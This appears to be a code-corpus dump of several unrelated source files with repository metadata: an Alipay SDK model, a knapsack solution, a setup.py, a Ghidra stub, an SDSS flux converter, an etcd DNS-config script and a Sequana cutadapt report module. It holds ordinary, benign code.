self._biz_unique_key = value
@property
def open_id(self):
return self._open_id
@open_id.setter
def open_id(self, value):
self._open_id = value
@property
def principal_id(self):
return self._principal_id
@principal_id.setter
def principal_id(self, value):
self._principal_id = value
@property
def principal_type(self):
return self._principal_type
@principal_type.setter
def principal_type(self, value):
self._principal_type = value
@property
def sign_version(self):
return self._sign_version
@sign_version.setter
def sign_version(self, value):
self._sign_version = value
@property
def tenant(self):
return self._tenant
@tenant.setter
def tenant(self, value):
self._tenant = value
@property
def valid_end_date(self):
return self._valid_end_date
@valid_end_date.setter
def valid_end_date(self, value):
self._valid_end_date = value
@property
def valid_start_date(self):
return self._valid_start_date
@valid_start_date.setter
def valid_start_date(self, value):
self._valid_start_date = value
def to_alipay_dict(self):
params = dict()
if self.app_name:
if hasattr(self.app_name, 'to_alipay_dict'):
params['app_name'] = self.app_name.to_alipay_dict()
else:
params['app_name'] = self.app_name
if self.biz_corp:
if hasattr(self.biz_corp, 'to_alipay_dict'):
params['biz_corp'] = self.biz_corp.to_alipay_dict()
else:
params['biz_corp'] = self.biz_corp
if self.biz_from:
if hasattr(self.biz_from, 'to_alipay_dict'):
params['biz_from'] = self.biz_from.to_alipay_dict()
else:
params['biz_from'] = self.biz_from
if self.biz_scene:
if hasattr(self.biz_scene, 'to_alipay_dict'):
params['biz_scene'] = self.biz_scene.to_alipay_dict()
else:
params['biz_scene'] = self.biz_scene
if self.biz_unique_key:
if hasattr(self.biz_unique_key, 'to_alipay_dict'):
params['biz_unique_key'] = self.biz_unique_key.to_alipay_dict()
else:
params['biz_unique_key'] = self.biz_unique_key
if self.open_id:
if hasattr(self.open_id, 'to_alipay_dict'):
params['open_id'] = self.open_id.to_alipay_dict()
else:
params['open_id'] = self.open_id
if self.principal_id:
if hasattr(self.principal_id, 'to_alipay_dict'):
params['principal_id'] = self.principal_id.to_alipay_dict()
else:
params['principal_id'] = self.principal_id
if self.principal_type:
if hasattr(self.principal_type, 'to_alipay_dict'):
params['principal_type'] = self.principal_type.to_alipay_dict()
else:
params['principal_type'] = self.principal_type
if self.sign_version:
if hasattr(self.sign_version, 'to_alipay_dict'):
params['sign_version'] = self.sign_version.to_alipay_dict()
else:
params['sign_version'] = self.sign_version
if self.tenant:
if hasattr(self.tenant, 'to_alipay_dict'):
params['tenant'] = self.tenant.to_alipay_dict()
else:
params['tenant'] = self.tenant
if self.valid_end_date:
if hasattr(self.valid_end_date, 'to_alipay_dict'):
params['valid_end_date'] = self.valid_end_date.to_alipay_dict()
else:
params['valid_end_date'] = self.valid_end_date
if self.valid_start_date:
if hasattr(self.valid_start_date, 'to_alipay_dict'):
params['valid_start_date'] = self.valid_start_date.to_alipay_dict()
else:
params['valid_start_date'] = self.valid_start_date
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AnttechBlockchainSignIndexCreateModel()
if 'app_name' in d:
o.app_name = d['app_name']
if 'biz_corp' in d:
o.biz_corp = d['biz_corp']
if 'biz_from' in d:
o.biz_from = d['biz_from']
if 'biz_scene' in d:
o.biz_scene = d['biz_scene']
if 'biz_unique_key' in d:
o.biz_unique_key = d['biz_unique_key']
if 'open_id' in d:
o.open_id = d['open_id']
if 'principal_id' in d:
o.principal_id = d['principal_id']
if 'principal_type' in d:
o.principal_type = d['principal_type']
if 'sign_version' in d:
o.sign_version = d['sign_version']
if 'tenant' in d:
o.tenant = d['tenant']
if 'valid_end_date' in d:
o.valid_end_date = d['valid_end_date']
if 'valid_start_date' in d:
o.valid_start_date = d['valid_start_date']
return o
|
[
"[email protected]"
] | |
9becd149112233943b28b41f338400549756c333
|
d3720c1848fb69a05121fcd378a12a6d1921f303
|
/4_LEETCODE/2_DP/背包问题/2_完全背包.py
|
35b58da0a6cc62245ebacf6c4ba97c14a70f2b33
|
[] |
no_license
|
fzingithub/SwordRefers2Offer
|
32a44e87c178bafc554108f1d1e479e18b0ee028
|
57f303aa6e76f7c5292fa60bffdfddcb4ff9ddfb
|
refs/heads/master
| 2023-04-08T09:35:02.082121 | 2023-03-28T00:06:00 | 2023-03-28T00:06:00 | 219,700,616 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,412 |
py
|
'''
f[i][j] 前i个物品,体积为j的背包,理论上的最大价值。
f[0][0] = 0
res = max{f[N]}
f[i][j] = max{f[i-1_最短回文串.py][j], f[i-1_最短回文串.py][j-k*v[i]] + k*w[i]}
'''
N, V = map(int, input().split())
v = [0] * (N + 1)
w = [0] * (N + 1)
for i in range(1, N + 1):
v[i], w[i] = map(int, input().split())
# print(N,V)
# print(v,w)
# f = [[0 for i in range(V+1_最短回文串.py)] for i in range(N+1_最短回文串.py)] # 初始化全0
#
# for i in range(1_最短回文串.py, N + 1_最短回文串.py):
# for j in range(V + 1_最短回文串.py):
# f[i][j] = f[i - 1_最短回文串.py][j]
# for k in range(1_最短回文串.py, j // v[i] + 1_最短回文串.py):
# f[i][j] = max(f[i][j], f[i - 1_最短回文串.py][j - k * v[i]] + k * w[i])
#
# print(f[N][V])
# # #优化 二维数组为一维数组
# f = [0 for i in range(V+1_最短回文串.py)] # 初始化全0
#
# for i in range(1_最短回文串.py, N + 1_最短回文串.py):
# for j in range(V, v[i]-1_最短回文串.py, -1_最短回文串.py):
# for k in range(0, j // v[i] + 1_最短回文串.py):
# f[j] = max(f[j], f[j - k * v[i]] + k * w[i])
#
# print(f[V])
#优化 取消k
f = [0 for i in range(V+1)] # 初始化全0
for i in range(1, N + 1):
for j in range(v[i], V+1):
f[j] = max(f[j], f[j-v[i]] + w[i])
print(f[V])
|
[
"[email protected]"
] | |
5e45adf16188acbf28a383b77c22d5cfe2685e61
|
0f0fa5a3086649a32ede3722ca14b598948f35e0
|
/setup.py
|
551e361538f8b43b270ed51115caee7d37d43ba1
|
[] |
no_license
|
marazmiki/django-mptt-admin
|
cf6b3648e3898233f99e2c2861f8254f61307e1a
|
125908b87066e957051f36fed6d60a3088f12cdb
|
refs/heads/master
| 2021-01-22T00:51:21.576551 | 2011-10-11T17:53:54 | 2011-10-11T17:53:54 | 2,557,013 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 889 |
py
|
#!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name = 'mpttadmin',
version = '0.3.1',
author = 'Mikhail Sakhno',
author_email = '[email protected]',
description = """jstree admin for mptt models""",
license = "BSD",
keywords = "django admin",
platforms = "POSIX",
url = 'http://code.tabed.org/mptt_admin',
install_requires=['django'],
packages=['mpttadmin'],#find_packages(),
package_data = { 'mpttadmin': [
'media/js/*.js',
'media/js/lib/*.js',
'media/js/lib/plugins/*.js',
'media/js/lib/themes/*/*',
]},
include_package_data=True,
classifiers=[
"Framework :: Django",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
"Operating System :: OS Independent",
"Topic :: Software Development"
],
)
|
[
"[email protected]"
] | |
4f9c8082760b3d5d3170e070cda411b8e7983824
|
d445cb91195bd60a695cb0ec2eefa5303c200443
|
/sequana/modules_report/cutadapt.py
|
4cbe41064cdb5c2ce6cb5bbc04da981cd980e385
|
[
"BSD-3-Clause"
] |
permissive
|
aditkashy/sequana
|
3606f28cebdd299f864ab2379c58f8133b7ff76c
|
3c9917368fb7c4de63dcd5416c874b682ee2b20d
|
refs/heads/master
| 2020-08-05T03:22:27.439165 | 2019-06-27T15:14:09 | 2019-06-27T15:14:09 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 19,713 |
py
|
# coding: utf-8
#
# This file is part of Sequana software
#
# Copyright (c) 2016 - Sequana Development Team
#
# File author(s):
# Thomas Cokelaer <[email protected]>
# Dimitri Desvillechabrol <[email protected]>,
# <[email protected]>
#
# Distributed under the terms of the 3-clause BSD license.
# The full license is in the LICENSE file, distributed with this software.
#
# website: https://github.com/sequana/sequana
# documentation: http://sequana.readthedocs.io
#
##############################################################################
"""Module to write coverage report"""
import os
import io
import json
from collections import Counter
from sequana.modules_report.base_module import SequanaBaseModule
from sequana.utils import config
from sequana.lazy import pandas as pd
from sequana.lazy import pylab
from sequana import logger
from sequana.utils.datatables_js import DataTable
class CutadaptModule(SequanaBaseModule):
""" Write HTML report of coverage analysis. This class takes either a
:class:`GenomeCov` instances or a csv file where analysis are stored.
"""
def __init__(self, cutadapt_log, sample_name, output_filename=None):
"""
:param input:
"""
super().__init__()
# Expected input data is the cutadapt log file
if os.path.exists(cutadapt_log) is False:
logger.error("This file {} does not exist".format(cutadapt_log))
self.input_filename = cutadapt_log
self.sample_name = sample_name
self.jinja = {}
self.data = {}
atropos_log = cutadapt_log.replace(".txt", ".json")
if os.path.exists(atropos_log):
self.input_mode = "atropos"
self.read_data() # store the rawdata
self.parse_atropos(atropos_log)
else:
self.input_mode = "cutadapt"
self.read_data() # store the rawdata
self.parse_cutadapt()
self._data_histograms = self._get_histogram_data()
self.create_report_content()
self.create_html(output_filename)
def create_report_content(self):
""" Generate the sections list to fill the HTML report.
"""
self.sections = list()
self.add_summary_section()
self.add_stat_section()
self.add_adapters_section()
self.add_histogram_section()
self.add_log_section()
def read_data(self):
with open(self.input_filename, "r") as fin:
self._rawdata = fin.read()
if "Total read pairs processed" in self._rawdata:
self.jinja['mode'] = "Paired-end"
self.mode = "pe"
else:
self.jinja['mode'] = "Single-end"
self.mode = "se"
def _get_data_tobefound(self):
tobefound = []
if self.mode == 'se':
tobefound.append(('total_reads', 'Total reads processed:'))
tobefound.append(('reads_with_adapters', 'Reads with adapters:'))
tobefound.append(('reads_with_adapters', 'Reads with adapter:'))
tobefound.append(('reads_too_short', 'Reads that were too short:'))
tobefound.append(('reads_kept', 'Reads written (passing filters):'))
else:
# ! spaces are probably import here below !
tobefound.append(('paired_total_reads', 'Total read pairs processed:'))
tobefound.append(('paired_reads1_with_adapters', ' Read 1 with adapter:'))
tobefound.append(('paired_reads2_with_adapters', ' Read 2 with adapter:'))
tobefound.append(('paired_reads_too_short', 'Pairs that were too short'))
tobefound.append(('paired_reads_kept', 'Pairs written (passing filters):'))
return tobefound
def add_log_section(self):
self.sections.append({
"name": "log",
"anchor": "log",
"content": "<pre>\n"+ self._rawdata + "</pre>\n"
})
def _get_stats(self):
if self.mode == "pe":
prefix = "paired_"
else:
prefix = ""
df = pd.DataFrame({'Number of reads': [], 'percent': []})
df.ix['Total paired reads'] = [
self.jinja['%stotal_reads' % prefix],
'(100%)']
if self.mode == "pe":
df.ix['Read1 with adapters'] = [
self.jinja['%sreads1_with_adapters' % prefix],
self.jinja['%sreads1_with_adapters_percent'% prefix]]
df.ix['Read2 with adapters'] = [
self.jinja['%sreads2_with_adapters' % prefix],
self.jinja['%sreads2_with_adapters_percent'% prefix]]
else:
df.ix['Pairs with adapters'] = [
self.jinja['%sreads_with_adapters' % prefix],
self.jinja['%sreads_with_adapters_percent'% prefix]]
df.ix['Pairs too short'] = [
self.jinja['%sreads_too_short' % prefix],
self.jinja['%sreads_too_short_percent'% prefix]]
df.ix['Pairs kept'] = [
self.jinja['%sreads_kept' % prefix],
self.jinja['%sreads_kept_percent' % prefix]]
if self.mode != "pe":
df.index = [this.replace('paired', '').replace('Pairs', 'Reads') for this in df.index]
return df
def _get_stat_section(self):
datatable = DataTable(self._get_stats(), "cutadapt", index=True)
datatable.datatable.datatable_options = {
'scrollX': '300px',
'pageLength': 15,
'scrollCollapse': 'true',
'dom': 'rtpB',
"paging": "false",
'buttons': ['copy', 'csv']}
js = datatable.create_javascript_function()
html_tab = datatable.create_datatable(float_format='%.3g')
#csv_link = self.create_link('link', self.filename)
#vcf_link = self.create_link('here', 'test.vcf')
html = "Reads statistics after trimming and adapter removal. The " +\
"A, C, G, T, N columns report the percentage of each bases in " +\
"the overall sequences"
html += "<p>{} {}</p>".format(html_tab, js)
return html
def add_stat_section(self):
self.sections.append({
"name": "Stats",
"anchor": "stats",
"content": self._get_stat_section()
})
def add_adapters_section(self):
# Create a Table with adapters
df = pd.DataFrame()
df = pd.DataFrame({'Length': [], 'Trimmed':[], 'Type':[], 'Sequence': [], })
for count, adapter in enumerate(self.data['adapters']):
name = adapter['name']
info = adapter['info']
df.ix[name] = [info['Length'], info['Trimmed'],
info['Type'], info['Sequence']]
df.columns = ['Length', 'Trimmed', 'Type', 'Sequence']
df['Trimmed'] = df.Trimmed.map(lambda x: int(x.replace("times.", "")))
# df.to_json(self.sample_name + "/cutadapt/cutadapt_stats2.json")
df.sort_values(by="Trimmed", ascending=False, inplace=True)
datatable = DataTable(df, "adapters", index=True)
datatable.datatable.datatable_options = {
'scrollX': 'true',
'pageLength': 15,
'scrollCollapse': 'true',
'dom': 'frtipB',
'buttons': ['copy', 'csv']}
js = datatable.create_javascript_function()
html_tab = datatable.create_datatable(float_format='%.3g')
self.jinja['adapters'] = ""
self.sections.append({
"name": "Adapters",
"anchor": "adapters",
"content": "<p>{} {}</p>".format(html_tab, js)
})
def add_summary_section(self):
""" Coverage section.
"""
#image = self.create_embedded_png(self.chromosome.plot_coverage,
# input_arg="filename")
import textwrap
command = "\n".join(textwrap.wrap(self.jinja['command'], 80))
command = self.jinja['command']
html = "<p>Data type: {} </p>".format(self.jinja["mode"])
html += '<div style="textwidth:80%">Command: <pre>{}</pre></div>'.format(command)
self.sections.append({
"name": "Data and command used",
"anchor": "cutadapt",
"content": html
})
def add_histogram_section(self):
"""Show only histograms with at least 3 counts
"""
histograms = self._data_histograms
html = ""
html += "<div>\n"
# get keys and count; Sort by number of adapters removed.
# TODO: could have reused the df
adapter_names = list(histograms.keys())
count = [histograms[k]['count'].sum() for k in adapter_names]
df2 = pd.DataFrame({'key':adapter_names, "count": count})
df2.sort_values(by="count", ascending=False, inplace=True)
for count, key in zip(df2["count"], df2['key']) :
if len(histograms[key]) <= 3:
continue
def plotter(filename, key):
name = key.replace(" ", "_")
pylab.ioff()
histograms[key].plot(logy=False, lw=2, marker="o")
pylab.title(name + "(%s)" % count)
pylab.grid(True)
pylab.savefig(filename)
pylab.close() # need to close the figure otherwise warnings
imagehtml = self.create_embedded_png(plotter, "filename",
style='width:45%', key=key)
html += imagehtml
html += "</div>\n"
self.jinja['cutadapt'] = html
self.sections.append({
"name": "Histogram",
"anchor": "histogram",
"content": "<p>Here are the most representative/significant adapters found in the data</p>"+ html
})
def parse_cutadapt(self):
d = {}
# output
tobefound = self._get_data_tobefound()
adapters = []
data = self._rawdata.splitlines()
# some metadata to extract
for this in tobefound:
key, pattern = this
found = [line for line in data if line.startswith(pattern)]
if len(found) == 0:
logger.warning("ReportCutadapt: %s (not found)" % pattern)
elif len(found) == 1:
text = found[0].split(":", 1)[1].strip()
try:
this, percent = text.split()
self.jinja[key] = this
self.jinja[key+'_percent'] = percent
except:
self.jinja[key] = text
self.jinja[key+'_percent'] = "?"
dd = {}
positions = []
executable = "cutadapt"
for pos, this in enumerate(data):
if "This is Atropos" in this:
executable = "atropos"
if "Command line parameters: " in this:
cmd = this.split("Command line parameters: ")[1]
self.jinja['command'] = executable + " " + cmd
if this.startswith("=== ") and "Adapter" in this:
name = this.split("=== ")[1].split(" ===")[0].strip()
dd['name'] = name
continue
if this.startswith('Sequence:'):
info = this.split("Sequence:", 1)[1].strip()
info = info.split(";")
dd['info'] = {
'Sequence': info[0].strip(),
'Type': info[1].split(':',1)[1].strip(),
'Length': info[2].split(':',1)[1].strip(),
'Trimmed': info[3].split(':',1)[1].strip()
}
adapters.append(dd.copy())
self.data["adapters"] = adapters
def _get_histogram_data(self):
"""In cutadapt logs, an adapter section contains
an histogram of matches that starts with a header
and ends with a blank line
"""
header = 'length\tcount\texpect\tmax.err\terror counts\n'
with open(self.input_filename, 'r') as fin:
# not too large so let us read everything
data = fin.readlines()
scanning_histogram = False
adapters = []
current_hist = header
dfs = {}
if "variable 5'/3'" in "\n".join(data):
cutadapt_mode = "b"
else:
cutadapt_mode = "other"
for this in data:
# while we have not found a new adapter histogram section,
# we keep going
# !! What about 5' / 3'
if this.startswith("==="):
if 'read: Adapter' in this:
# We keep read: Adatpter because it may be the first
# or second read so to avoid confusion we keep the full
# name for now.
name = this.replace("First read: Adapter ", "R1_")
name = name.replace("Second read: Adapter ", "R2_")
name = name.strip().strip("===")
name = name.strip()
elif "=== Adapter" in this:
name = this.split("=== ")[1].split(" ===")[0]
name = name.strip()
else:
pass
if scanning_histogram is False:
if this == header:
# we found the beginning of an histogram
scanning_histogram = True
else:
# we are somewhere in the log we do not care about
pass
elif scanning_histogram is True and len(this.strip()) != 0:
# accumulate the histogram data
current_hist += this
elif scanning_histogram is True and len(this.strip()) == 0:
# we found the end of the histogram
# Could be a 5'/3' case ? if so another histogram is
# possible
df = pd.read_csv(io.StringIO(current_hist), sep='\t')
#reinitiate the variables
if cutadapt_mode != "b":
dfs[name] = df.set_index("length")
current_hist = header
scanning_histogram = False
else:
# there will be another histogram so keep scanning
current_hist = header
# If we have already found an histogram, this is
# therefore the second here.
if name in dfs:
if len(df):
dfs[name] = dfs[name].append(df.set_index("length"))
scanning_histogram = False
dfs[name] = dfs[name].reset_index().groupby("length").aggregate(sum)
else:
dfs[name] = df.set_index("length")
scanning_histogram = True
else:
pass
return dfs
def parse_atropos(self, filename):
"""Parse the atropos report (JSON format)"""
data = json.load(open(filename, "r"))
# Is it paired or single-ended ?
if data['input']['input_names'][1] is None:
self.jinja['mode'] = "Singled-end"
prefix = ""
self.mode = "se"
else:
self.jinja['mode'] = "Paired-end"
prefix = "paired_"
self.mode = "pe"
dfs = {}
self.data['adapters'] = []
data_adapters = data['trim']['modifiers']['AdapterCutter']['adapters']
reads = [0] * len(data_adapters[0])
adapters = list(data_adapters[0].keys())
N = data["record_counts"]['0']
try:
# Read2
reads.extend( [1] * len(data_adapters[1]))
adapters.extend(list(data_adapters[1].keys()))
except:
pass
read_tag = {0: "First read: ", 1: "Second read: "}
for read, name in zip(reads, adapters):
data_adapter = data_adapters[read][name]
type_ = data_adapter['where']['desc']
sequence = data_adapter["sequence"]
length = len(sequence)
trimmed = data_adapter['total']
max_error = data_adapter['max_error_rate']
# this takes care of the A,B,G mode of cutadapt/atropos
d = Counter()
for this in ['lengths_front', 'lengths_back']:
if this in data_adapter.keys():
d += Counter(data_adapter[this])
count = pd.DataFrame(list(d.values()), list(d.keys()), columns=['count'])
count = count.reset_index().astype(int).sort_values("index", ascending=True)
count.set_index("index", inplace=True)
count['max err'] = [int(round(x * max_error)) for x in count.index]
count.reset_index(inplace=True)
count.rename(columns={"index":"length"}, inplace=True)
count['expect'] = 0.25 ** count['length'] * N
count.set_index("length", inplace=True)
count = count[["count", "expect", "max err"]]
dfs["R{}_".format(read+1) + name] = count.copy()
# Note that the following text must be kept as it is since
# it is then parsed in other methods
self.data['adapters'].append({"info": {
"Length": length,
"Sequence": sequence,
"Trimmed": "{} times.".format(trimmed),
"Type": type_}, "name": read_tag[read]+name})
# Store the histograms
self._data_histograms = dfs
# aliases
formatters = data['trim']['formatters']
filters = data['trim']['filters']['too_short']
cutter = data['trim']['modifiers']['AdapterCutter']
def _format(value):
return "({}%)".format(100 * int(round(value,3)*1000)/1000.)
self.jinja['%stotal_reads' % prefix] = N
self.jinja['%sreads1_with_adapters' % prefix] = \
str(cutter["records_with_adapters"][0])
self.jinja['%sreads1_with_adapters_percent'% prefix] = \
_format(cutter["fraction_records_with_adapters"][0])
# duplicated reads1 in reads for the single-end cae
# This should be clean but is required for now to be compatibl
# with the code used with cutadapt
self.jinja['%sreads_with_adapters' % prefix] = \
str(cutter["records_with_adapters"][0])
self.jinja['%sreads_with_adapters_percent'% prefix] = \
_format(cutter["fraction_records_with_adapters"][0])
if self.mode == "pe":
self.jinja['%sreads2_with_adapters' % prefix] = \
cutter["records_with_adapters"][1]
self.jinja['%sreads2_with_adapters_percent'% prefix] = \
_format(cutter["fraction_records_with_adapters"][1])
self.jinja['%sreads_too_short' % prefix] = filters["records_filtered"]
self.jinja['%sreads_too_short_percent'% prefix] = \
_format(filters["fraction_records_filtered"])
self.jinja['%sreads_kept' % prefix] = formatters['records_written']
self.jinja['%sreads_kept_percent' % prefix] = \
_format(formatters['fraction_records_written'])
self.jinja['command'] = "{} {} {}".format("atropos",
data['options']['action'], " ".join(data['options']['orig_args']))
|
[
"[email protected]"
] | |
d784039fbf29070d60585c62c411d71fd3bbbec9
|
943dca755b940493a8452223cfe5daa2fb4908eb
|
/abc303/a.py
|
252013eff15c913bcc6984509b0f36ea3d48e9cc
|
[] |
no_license
|
ymsk-sky/atcoder
|
5e34556582763b7095a5f3a7bae18cbe5b2696b2
|
36d7841b70b521bee853cdd6d670f8e283d83e8d
|
refs/heads/master
| 2023-08-20T01:34:16.323870 | 2023-08-13T04:49:12 | 2023-08-13T04:49:12 | 254,348,518 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 256 |
py
|
n = int(input())
s = input()
t = input()
for i in range(n):
if s[i] == t[i]:
continue
if (s[i] in "l1") and (t[i] in "l1"):
continue
if (s[i] in "o0") and (t[i] in "o0"):
continue
print("No")
exit()
print("Yes")
|
[
"[email protected]"
] | |
31fe857b5336046fc4b93282f053a38847cfe0bf
|
786027545626c24486753351d6e19093b261cd7d
|
/ghidra9.2.1_pyi/ghidra/program/model/listing/Bookmark.pyi
|
daf5c68be46b4922037f73b7817afe92f2eb5835
|
[
"MIT"
] |
permissive
|
kohnakagawa/ghidra_scripts
|
51cede1874ef2b1fed901b802316449b4bf25661
|
5afed1234a7266c0624ec445133280993077c376
|
refs/heads/main
| 2023-03-25T08:25:16.842142 | 2021-03-18T13:31:40 | 2021-03-18T13:31:40 | 338,577,905 | 14 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,124 |
pyi
|
import ghidra.program.model.address
import ghidra.program.model.listing
import java.lang
class Bookmark(java.lang.Comparable, object):
"""
Interface for bookmarks. Bookmarks are locations that are marked within the program so
that they can be easily found.
"""
def compareTo(self, __a0: object) -> int: ...
def equals(self, __a0: object) -> bool: ...
def getAddress(self) -> ghidra.program.model.address.Address:
"""
Returns address at which this bookmark is applied.
"""
...
def getCategory(self) -> unicode:
"""
Returns bookmark category
"""
...
def getClass(self) -> java.lang.Class: ...
def getComment(self) -> unicode:
"""
Returns bookmark comment
"""
...
def getId(self) -> long:
"""
Returns the id of the bookmark.
"""
...
def getType(self) -> ghidra.program.model.listing.BookmarkType:
"""
Returns bookmark type object.
"""
...
def getTypeString(self) -> unicode:
"""
Returns bookmark type as a string
"""
...
def hashCode(self) -> int: ...
def notify(self) -> None: ...
def notifyAll(self) -> None: ...
def set(self, category: unicode, comment: unicode) -> None:
"""
Set the category and comment associated with a bookmark.
@param category category
@param comment single line comment
"""
...
def toString(self) -> unicode: ...
@overload
def wait(self) -> None: ...
@overload
def wait(self, __a0: long) -> None: ...
@overload
def wait(self, __a0: long, __a1: int) -> None: ...
@property
def address(self) -> ghidra.program.model.address.Address: ...
@property
def category(self) -> unicode: ...
@property
def comment(self) -> unicode: ...
@property
def id(self) -> long: ...
@property
def type(self) -> ghidra.program.model.listing.BookmarkType: ...
@property
def typeString(self) -> unicode: ...
|
[
"[email protected]"
] | |
475b498730558cf3635706a19a5fa90410feb142
|
5e8a936891f0687a28425cef248a49480511119d
|
/pydl/photoop/sdssio/sdssflux2ab.py
|
47c8f6487d8d12f42405f6e9f4201e85ccf8ddba
|
[
"BSD-3-Clause"
] |
permissive
|
bsipocz/pydl
|
426a4cdae003b8c4e86249ec36005925d8ffa341
|
f8719699c71806f9b55dd41f843e5f35c64c770b
|
refs/heads/master
| 2020-12-07T15:43:01.554352 | 2015-09-24T03:15:14 | 2015-09-24T03:15:14 | 45,721,009 | 0 | 0 | null | 2015-11-07T03:30:30 | 2015-11-07T03:30:29 | null |
UTF-8
|
Python
| false | false | 1,515 |
py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
def sdssflux2ab(flux,magnitude=False,ivar=False):
"""Convert the SDSS calibrated fluxes (magnitudes) into AB fluxes (magnitudes)
Parameters
----------
flux : :class:`numpy.ndarray`
Array of calibrated fluxes or SDSS magnitudes with 5 columns,
corresponding to the 5 filters u,g,r,i,z
magnitude : :class:`bool`, optional
If set to ``True``, then assume `flux` are SDSS magnitudes instead of linear
flux units
ivar : :class:`numpy.ndarray`, optional
If set, the input fluxes are actually inverse variances.
Returns
-------
sdssflux2ab : :class:`numpy.ndarray`
Array of fluxes or magnitudes on the AB system.
Notes
-----
Uses the conversions posted by D.Hogg (sdss-calib/845)::
u(AB,2.5m) = u(2.5m) - 0.042
g(AB,2.5m) = g(2.5m) + 0.036
r(AB,2.5m) = r(2.5m) + 0.015
i(AB,2.5m) = i(2.5m) + 0.013
z(AB,2.5m) = z(2.5m) - 0.002
"""
import numpy as np
#
# Correction vector, adjust this as necessary
#
correction = np.array([-0.042, 0.036, 0.015, 0.013, -0.002])
rows, cols = flux.shape
abflux = flux.copy()
if magnitude:
for i in range(rows):
abflux[i,:] += correction
else:
factor = 10.0**(-correction/2.5)
if ivar:
factor = 1.0/factor**2
for i in range(rows):
abflux[i,:] *= factor
return abflux
|
[
"[email protected]"
] | |
2029faea3ce5dd5bad299577b11c46950ad7913a
|
9ddee35a496f1b99d4f9b634711d30ad9f05a2fa
|
/case/httpdns/1070.py
|
7e2515e5721ac05c0e0485a9afdee9851e57738d
|
[] |
no_license
|
namesuqi/pirate
|
79824f231990030bdce9e092b300bb58d4ba0024
|
9308fbfa021f1238c2bd6faeb7d82c2934570140
|
refs/heads/master
| 2020-03-07T04:19:07.041355 | 2018-03-29T08:44:29 | 2018-03-29T08:44:29 | 127,263,075 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,818 |
py
|
#!/usr/bin/env python
# coding=utf-8
# author: zengyuetian
from libs.database.etcd_handler import *
if __name__ == "__main__":
# 需要根据当前实际配置修改
ttl_conf_old = {"report.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
"channel.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
"upgradev2.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
"opt.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
"hls.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
"stats.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
"seeds.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
"vodtest.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
"stun2.crazycdn.com": {"ips": {"default": ["118.190.148.163"]}, "ttl": 1800},
"live-ch.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
"ts.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
"control.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800},
"errlogs.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 1800}}
# print(read_etcd_key('/business/httpdns/v2/domain_ip_map/default'))
ttl_conf_1 = {"report.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
"channel.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
"upgradev2.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
"opt.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
"hls.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
"stats.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
"seeds.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
"vodtest.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
"stun2.crazycdn.com": {"ips": {"default": ["118.190.148.163"]}, "ttl": 300},
"live-ch.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
"ts.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
"control.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300},
"errlogs.crazycdn.com": {"ips": {"default": ["47.104.178.217"]}, "ttl": 300}}
set_etcd_key('default', ttl_conf_old, '/business/httpdns/v2/domain_ip_map/')
|
[
"[email protected]"
] | |
0f4cf276661a0de3bf63c88b9d994d2d5f69c7d8
|
4b8724ec7bb224ff942264384dd7cb9c96676789
|
/car_project/apps/car_app/apps.py
|
5918e5de83ee63f6642071520899f8fe9ebc0126
|
[] |
no_license
|
JeffLawrence1/Python-Django-Advanced
|
b4822528bbaa5a235817121b32407c11408d8932
|
b41018d907f06aeb7ca05f1f4b030eedf58471e7
|
refs/heads/master
| 2020-03-09T07:59:11.954262 | 2018-04-08T20:15:45 | 2018-04-08T20:15:45 | 128,678,232 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 153 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class CarAppConfig(AppConfig):
name = 'car_app'
|
[
"[email protected]"
] | |
135cfce1a38a80aef2ddbb1e9113a1026fd178bc
|
b4af2cf7457ab6fe8e5b31cdc8bfcbb0081238f3
|
/test/test_application/test_vo_service.py
|
34998a707ae04be2b8436b46e27fceed839230b9
|
[
"MIT"
] |
permissive
|
osthafen/spruned
|
aa13fe8568efe17877c5971ea785d0c0decc619b
|
2094fd66fd590bd1487fbb284ce5c6e979986a90
|
refs/heads/master
| 2020-03-27T22:41:24.699583 | 2018-09-03T20:52:08 | 2018-09-03T20:52:08 | 147,252,407 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 21,857 |
py
|
import asyncio
import io
import json
import unittest
from unittest.mock import Mock, create_autospec
import binascii
from pycoin.block import Block
from spruned import settings
